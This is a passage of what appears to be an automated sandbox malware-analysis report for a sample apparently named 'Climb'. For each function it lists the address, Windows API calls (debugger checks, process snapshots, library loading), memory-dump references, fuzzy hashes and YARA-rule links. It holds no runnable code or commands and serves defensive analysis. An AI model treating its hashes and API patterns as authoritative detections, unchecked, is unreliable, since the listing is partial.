Opcode Fuzzy Hash: 44f2913243fa824ad02c13c9c46e7135110b8997dd305c8d90c1e54df07b550a
Instruction Fuzzy Hash: 71F0A43490020CB6CB40BBA8ED46D9E776C5E01750B504270F928965A2FB70EA1D8790

Function 00AE89B6 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00AE8D52
TerminateProcess.KERNEL32(00000000), ref: 00AE8D59
FreeLibrary.KERNEL32(?,?,?,?), ref: 00AE8F3A

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 038017dcc879978d326b2c0b4f9349691601f4773467cd92a88f9d24b51740ae
Instruction ID: 63438900790893a9a2f0627d3f022c66d3ce35ab7d82046255d6d77f5a042b82
Opcode Fuzzy Hash: 038017dcc879978d326b2c0b4f9349691601f4773467cd92a88f9d24b51740ae
Instruction Fuzzy Hash: 72128A71A083409FC710DF29C584B2ABBE5FF89318F14895DE8898B392DB35ED45CB92

Function 00A62793 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A632AF
Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A632B7
Part of subcall function 00A6327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A632C2
Part of subcall function 00A6327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A632CD
Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A632D5
Part of subcall function 00A6327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A632DD

Part of subcall function 00A63205: RegisterWindowMessageW.USER32(00000004,?,00A62964), ref: 00A6325D

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A62A0A
OleInitialize.OLE32 ref: 00A62A28
CloseHandle.KERNEL32(00000000,00000000), ref: 00AA3A0D

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 6bfbc41ba3eb549dad97e5151a127dcff6d217887c610ed43115217cdcc6e8a1
Instruction ID: 97c381eeffe1e58589fe8ff3bc72c4a03450a35543aed25d0723e13a40578086
Opcode Fuzzy Hash: 6bfbc41ba3eb549dad97e5151a127dcff6d217887c610ed43115217cdcc6e8a1
Instruction Fuzzy Hash: DA71ABB59112009FC789EFB9BE6A61D3AF1BB68300732826AE609C7371EF704645CF54

Function 00A7FCAD Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A661A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A66299

KillTimer.USER32(?,00000001,?,?), ref: 00A7FD36
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A7FD45
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ABFE33

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 9e51837c422f2be5a90ef84046c6e37504f23af7d9b5cde21e046fb788ac01d4
Instruction ID: a7ff28e001621827dc9c92653311b1f8a593583d74effd08ba255b0ec585900d
Opcode Fuzzy Hash: 9e51837c422f2be5a90ef84046c6e37504f23af7d9b5cde21e046fb788ac01d4
Instruction Fuzzy Hash: 28318171904344AFEB32CF648C95BEABBFCAB02308F1444AED69A97242D7745A85CB51

Function 00A98A2E Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,?,00A9894C,?,00B29CE8,0000000C), ref: 00A98A84
GetLastError.KERNEL32(?,00A9894C,?,00B29CE8,0000000C), ref: 00A98A8E
__dosmaperr.LIBCMT ref: 00A98AB9

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: f8c90a7bb91b0811c81271e8383632290846913beca8b1727ab75a1b8781f147
Instruction ID: ec4eafb2dfaff1a017ce7a5d312633a23ff1eb07cfbc97abd8729108dd568cbe
Opcode Fuzzy Hash: f8c90a7bb91b0811c81271e8383632290846913beca8b1727ab75a1b8781f147
Instruction Fuzzy Hash: 2D012B32B051606ACE2563B8BD46B7E67C94B837B4F2B061AF9149B5D2EF388D815290

Function 00A9970B Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00A997BA,FF8BC369,00000000,00000002,00000000), ref: 00A99744
GetLastError.KERNEL32(?,00A997BA,FF8BC369,00000000,00000002,00000000,?,00A95ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00A86F41), ref: 00A9974E
__dosmaperr.LIBCMT ref: 00A99755

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: bb3bd4208b4607bb385b92fbdc057ed894a7e348fbf62a8e296f64ba7d0ee1c1
Instruction ID: dd954a9f651f0a1e443d7f19c305fa4001747782408f201601af0a747b33ca9c
Opcode Fuzzy Hash: bb3bd4208b4607bb385b92fbdc057ed894a7e348fbf62a8e296f64ba7d0ee1c1
Instruction Fuzzy Hash: C301F532720115BB8F059FEDEC0686F3B6AEB85320B240319F8119B190EE309D419BA0

Function 00A6F238 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00A6F27B
DispatchMessageW.USER32(?), ref: 00A6F289
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A6F29F
Sleep.KERNEL32(0000000A), ref: 00A6F2B1
TranslateAcceleratorW.USER32(?,?,?), ref: 00AB32D8

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 952583fec20d1d924b5888805cb9e636184060adf71d18344444df0c60597e3e
Instruction ID: 5831821ac96c6633a33e21982c7977d3e7749fd8ff4eba6031b248f4197793c8
Opcode Fuzzy Hash: 952583fec20d1d924b5888805cb9e636184060adf71d18344444df0c60597e3e
Instruction Fuzzy Hash: 23F05E312043449BEB34DBF4DC89FEA73ADAB44300F108929E209970C0DB309588CB25

Function 00A72B20 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A73006

Strings

CALL, xrefs: 00A72FD6

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 08f102f8334d37a65bc79ef6b7d7ba3ceea1c12cf7985922f31471db35fc32a4
Instruction ID: 10723c22266a8da66f9e194e1a6824781c0aea03e8ac09f6c3b0cdc523a298ea
Opcode Fuzzy Hash: 08f102f8334d37a65bc79ef6b7d7ba3ceea1c12cf7985922f31471db35fc32a4
Instruction Fuzzy Hash: CF2288706082419FD724DF24C884B2ABBF5BF98314F24C95DF49A8B3A2D771E945CB92

Function 00A71990 Relevance: 3.6, APIs: 2, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 687a785f257fc0fed399ac205deb9e9c75ad48ca2843c65211c65c7bbe000cf7
Instruction ID: 56b41c7634596729eab3c5de0d6eee84e819e57ab02e6472054b57b33d1d4259
Opcode Fuzzy Hash: 687a785f257fc0fed399ac205deb9e9c75ad48ca2843c65211c65c7bbe000cf7
Instruction Fuzzy Hash: 4432AE70A00205DFCB24EF68CD85EEEB7B8AF04314F14C559E919AB2A2E735ED54CB91

Function 00A63A95 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00AA413B

Part of subcall function 00A65851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A655D1,?,?,00AA4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A65871

Part of subcall function 00A63A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00A63A76

Strings

X, xrefs: 00AA4109

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 425015161cc3a592d523e3ef26bcba2784479b6ffe03cb4ddb92e516657186a6
Instruction ID: b07a6fcc39a38f8f4496d4ef81fee72bce8f326813b2979b4ff5c42a1d439f3f
Opcode Fuzzy Hash: 425015161cc3a592d523e3ef26bcba2784479b6ffe03cb4ddb92e516657186a6
Instruction Fuzzy Hash: E521A171A002589BCB01DFE4C905BEE7BF8AF49300F008059E545A7281DFF99A898F61

Function 00A7FFE0 Relevance: 3.1, APIs: 2, Instructions: 94processCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00A8007D
CreateToolhelp32Snapshot.KERNEL32 ref: 00A8008F

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: CloseCreateHandleSnapshotToolhelp32
String ID:
API String ID: 3280610774-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: fbd9b26ed6858e9e84ed6fee9c5224fcf09ea942cf834d6c2c1db7d75cb37bdf
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: D131D270A00109DFC798EF58D490E69FBB6FB59300B2486A5E44ACB656D732EDC5CBC0

Function 00A6396B Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A63A3C

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 729884755e4694db70bbc9967624331f068c4e9fb6706a7bd179cfd8324dcbc3
Instruction ID: f5cb12a87c2648f40de8b6d07de8878a9c06726ed10e4d90dfd352cd79129571
Opcode Fuzzy Hash: 729884755e4694db70bbc9967624331f068c4e9fb6706a7bd179cfd8324dcbc3
Instruction Fuzzy Hash: FA31D2726043009FD721DF64D88479BBBF8FB49308F00092EF6D987281E7B5A948CB92

Function 00A6331B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A6333D

Part of subcall function 00A632E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A632FB
Part of subcall function 00A632E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A63312

Part of subcall function 00A6338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A63368,?), ref: 00A633BB
Part of subcall function 00A6338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A63368,?), ref: 00A633CE
Part of subcall function 00A6338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B32418,00B32400,?,?,?,?,?,?,00A63368,?), ref: 00A6343A
Part of subcall function 00A6338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00B32418,?,?,?,?,?,?,?,00A63368,?), ref: 00A634BB

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A63377

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 06e0e870bbe6da09797e9313ea1927cdcf75da90d8f077702ff3b346726502df
Instruction ID: d897ecec70a1cd4fa8d0f42f7609f99d335f5de4ccddd1106c8f82cea48506c2
Opcode Fuzzy Hash: 06e0e870bbe6da09797e9313ea1927cdcf75da90d8f077702ff3b346726502df
Instruction Fuzzy Hash: 54F05E72954744AFD701AFB0EE0BB6C37A4E700709F244819B6098B1E2DFBA8156CB48

Function 00A6CAB0 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A6CEEE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 46aa2eac7afe66aef523089323ce5cd25c1b92e3827ca3b074810706e6bda410
Instruction ID: a8e9b27521297e24edbd14364ccb4378fc923e339cc3a7f26fedb7c8d1e5c2f6
Opcode Fuzzy Hash: 46aa2eac7afe66aef523089323ce5cd25c1b92e3827ca3b074810706e6bda410
Instruction Fuzzy Hash: 3E32E175A00205EFCB20CF58C894ABEB7F9FF45360F648059E956AB252CB35ED81CB90

Function 00AE7AF9 Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 014c10c2368624ee91d0d2c9b0a2ab5480967dd832283009b2ebeacef8e2f118
Instruction ID: 9710510af79cff7f00c8ab4145058d16cc7953905adb142903acae938f4b45cd
Opcode Fuzzy Hash: 014c10c2368624ee91d0d2c9b0a2ab5480967dd832283009b2ebeacef8e2f118
Instruction Fuzzy Hash: 94D15C74A04249EFCB14EF99C9819EDBBB5FF48310F148159E915AB391DB30AE81CF90

Function 00A8F106 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87e7ad439ee7dafe9f03b4dac14527d3402add14c2aedddc69a0333e6778e7be
Instruction ID: 3b5581226c94efcc905d661a04f0036b415a2f3f69cd5bf50b8df523f497612c
Opcode Fuzzy Hash: 87e7ad439ee7dafe9f03b4dac14527d3402add14c2aedddc69a0333e6778e7be
Instruction Fuzzy Hash: 6151B575A00109AFDB10EF68C845FE97BB5EF85364F198268E8189B391E731ED42CB90

Function 00ACFCB5 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00ACFCCE

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: BuffCharLower
String ID:
API String ID: 2358735015-0
Opcode ID: 892fe5c993be3fe149636f99a39bb07f1dfb130ab85578f3af586885e71be356
Instruction ID: 3285bfa1f77cd9e800006a5f228cca7513f886184b52f73738e3c4797f21d835
Opcode Fuzzy Hash: 892fe5c993be3fe149636f99a39bb07f1dfb130ab85578f3af586885e71be356
Instruction Fuzzy Hash: 3C41A476600209AFCB12EFA8C881EAEB7B9EF44314B21453EE91797251EB70DE05CB50

Function 00A66679 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A6663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6664A
Part of subcall function 00A6663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A6665C
Part of subcall function 00A6663E: FreeLibrary.KERNEL32(00000000,?,?,00A6668B,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A6666E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A666AB

Part of subcall function 00A66607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66610
Part of subcall function 00A66607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A66622
Part of subcall function 00A66607: FreeLibrary.KERNEL32(00000000,?,?,00AA5657,?,?,00A662FA,?,00000001,?,?,00000000), ref: 00A66635

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_a60000_Climb.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 60e826c691f5933c377890582e40bb3caf62baa252d47f5b042c5deae8a33b4f
Instruction ID: 294afcdb24e2a3fef2bc0272ce00a96c07790650d1830c3b7d18e142ef64d80e
Opcode Fuzzy Hash: 60e826c691f5933c377890582e40bb3caf62baa252d47f5b042c5deae8a33b4f
Instruction Fuzzy Hash: 7811E376600205ABCF18BB74DA02BAD7BB5AF50710F10482DF452A71C2EFB1EA05DB50

Function 00A98782 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00A987C0

Memory Dump Source

Source File: 0000000E.00000002.3575587739.0000000000A61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00A60000, based on PE: true

Associated: 0000000E.00000002.3575567220.0000000000A60000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000AFD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575669988.0000000000B23000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575740330.0000000000B2D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3575767292.0000000000B35000.00000002.00000001.01000000.0000000A.sdmpDownload File

